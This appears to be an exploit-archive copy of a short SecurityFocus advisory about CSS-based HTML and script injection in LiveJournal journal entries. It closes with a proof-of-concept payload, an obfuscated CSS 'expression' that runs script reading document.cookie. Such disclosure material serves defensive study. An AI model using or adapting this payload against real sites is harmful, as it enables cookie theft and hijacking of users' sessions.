11 lines
No EOL
461 B
Text
11 lines
No EOL
461 B
Text
source: http://www.securityfocus.com/bid/9727/info
|
|
|
|
LiveJournal is reportedly prone to HTML injection via Cascading Style Sheet (CSS) tags. It is possible to inject hostile HTML and script code into journal entries through this vulnerability.
|
|
|
|
This could potentially be exploited to steal cookies from other site users. Other attacks are also possible.
|
|
|
|
<style>
|
|
.test1 { color:e\xpression(alert(document.cookie)); }
|
|
</style>
|
|
|
|
<a class="test1">foo</a> |